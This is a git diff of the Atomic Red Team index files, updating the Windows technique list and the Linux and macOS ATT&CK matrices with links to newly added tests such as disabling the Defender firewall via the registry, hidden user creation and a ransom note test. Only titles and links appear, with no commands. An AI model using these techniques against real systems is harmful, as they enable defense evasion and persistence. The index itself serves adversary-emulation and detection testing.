   - Atomic Test #3: LaZagne - Credentials from Browser [windows]
@@ -359,10 +361,11 @@
   - Atomic Test #4: Clear Windows Audit Policy Config [windows]
 - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
   - Atomic Test #2: Disable Microsoft Defender Firewall [windows]
-  - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
-  - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
-  - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
-  - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
+  - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows]
+  - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows]
+  - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows]
+  - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows]
+  - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows]
 - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
   - Atomic Test #10: Unload Sysmon Filter Driver [windows]
   - Atomic Test #11: Uninstall Sysmon [windows]
@@ -407,7 +410,7 @@
   - Atomic Test #1: Hidden Window [windows]
 - [T1564 Hide Artifacts](../../T1564/T1564.md)
   - Atomic Test #1: Extract binary files via VBA [windows]
-  - Atomic Test #2: Create a user called "$" as noted here [windows]
+  - Atomic Test #2: Create a Hidden User Called "$" [windows]
   - Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1562.003 Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -439,7 +442,9 @@
   - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
   - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
+  - Atomic Test #1: Mount ISO image [windows]
+  - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
 - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
   - Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
   - Atomic Test #2: Creating W32Time similar named service using sc [windows]
@@ -765,7 +770,8 @@
 - T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1485 Data Destruction](../../T1485/T1485.md)
   - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
-- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
+  - Atomic Test #5: PureLocker Ransom Note [windows]
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1044,7 +1050,8 @@
   - Atomic Test #1: Execute a Command as a Service [windows]
   - Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
 - T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+  - Atomic Test #1: Radmin Viewer Utility [windows]
 - T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
@@ -1111,7 +1118,8 @@
   - Atomic Test #3: Copy and Execute File with PsExec [windows]
   - Atomic Test #4: Execute command writing output to local Admin Share [windows]
 - T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+  - Atomic Test #1: Radmin Viewer Utility [windows]
 - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index 420df707..453f1a9f 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -1,16 +1,16 @@
 # Linux Atomic Tests by ATT&CK Tactic & Technique
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -26,7 +26,7 @@
 |  | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-|  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | [System Information Discovery](../../T1082/T1082.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Screen Capture](../../T1113/T1113.md) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Non-Standard Port](../../T1571/T1571.md) |  |
 |  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
@@ -45,7 +45,7 @@
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [SSH Authorized Keys](../../T1098.004/T1098.004.md) |  | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  |  |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Systemd Service](../../T1543.002/T1543.002.md) |  | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Systemd Timers](../../T1053.006/T1053.006.md) |  | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md
index b4352dce..1c1dc3c9 100644
--- a/atomics/Indexes/Matrices/macos-matrix.md
+++ b/atomics/Indexes/Matrices/macos-matrix.md
@@ -4,7 +4,7 @@
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
